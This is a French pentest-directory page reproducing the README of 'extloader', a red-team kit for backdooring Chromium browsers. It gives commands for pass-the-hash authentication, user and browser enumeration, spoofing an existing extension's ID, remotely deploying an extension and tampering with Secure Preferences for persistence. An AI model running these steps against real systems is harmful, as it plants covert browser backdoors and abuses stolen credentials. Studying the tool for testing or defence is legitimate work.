Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
extloader — Un kit d'exploitation d'extensions Chromium | Kitploit
Outils/GitHubGitHub/synacktiv/extloader
Mécanismes de PersistanceExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionRed Teaming
GitHubsynacktiv/extloader

extloader

Un kit d'exploitation d'extensions Chromium

Voir le dépôt
2627il y a 11 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

extLoader

Une petite boîte à outils pour gérer et déployer des extensions Chromium non empaquetées.

En savoir plus dans l'article de blog suivant : https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installation

Installation directe (pipx)

root@kitploit:~
pipx install .
extloader --help

Utilisez pipx pour une installation isolée ciblant Python 3.10+.

Configuration de développement (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Options d'authentification

  • Mot de passe : -p/--password
  • Hash : (format LM:NT ou NT seul)
Télécharger l’outil
-H/--hash
  • Domaine : -d/--domain (par défaut WORKGROUP)
  • Paramètres communs

    • -t, --target : IP/nom d'hôte cible
    • -u, --username : Nom d'utilisateur
    • -i, --index : Index de l'utilisateur issu de la commande check
    • --debug : Activer les journaux de débogage

    Utilisation

    Voici un exemple pas à pas de déploiement d'une extension :

    1. Tout d'abord, vérifiez les cibles disponibles :
    root@kitploit:~
    # This will list available users and browsers
    extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
    
    ┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
    ┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    │   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    └────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
    

    Lorsque vous exécutez l'exploit sur une autre machine, exécutez toujours la commande check au préalable pour actualiser le contexte (available_targets.json).

    1. Préparez le manifeste (signez ou usurpez un ID) :
    root@kitploit:~
    # Create a deterministic crx_id by adding a key to the manifest.json
    extloader sign --extension ./my-extension
    

    Pour usurper l'ID d'une extension existante, ignorez la commande ci-dessus et définissez la clé key du manifeste sur la clé publique base64 de l'extension que vous imitez. Réutiliser cette clé conserve l'ID CRX inchangé.

    1. Déployez l'extension :
    root@kitploit:~
    # Deploy to user index 1 (Chrome of john.doe)
    extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
    

    4.(Alternative) Empaquetez pour un déploiement manuel :

    root@kitploit:~
    # Bundle the signed extension with the captured Preferences file
    extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
    
    # This creates a ZIP containing:
    # - Signed extension files
    # - Updated preferences files
    # - Deployment instructions
    

    --prefs-file attend les préférences du profil du navigateur que vous avez sauvegardées (Chrome/Edge les stockent sous Secure Preferences, les autres navigateurs Chromium utilisent Preferences). Le loader le copie, le modifie, et inclut à la fois les versions modifiée et non modifiée dans le package.

    root@kitploit:~
    ├── extension/
    │   └── chrome-mv3/
    ├── preferences/
    │   ├── brave/
    │   ├── chrome/
    │   ├── chromium/
        [...]
    └── info.json
    
    1. Restaurez les préférences d'origine si nécessaire :
    root@kitploit:~
    # Restore original preferences for user index 1 (need check command to get the correct context)
    extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
    

    TODO

    • Support de Kerberos
    • Module nxc
    • Adapter le workflow package pour Linux
    • Adapter le workflow package pour macOS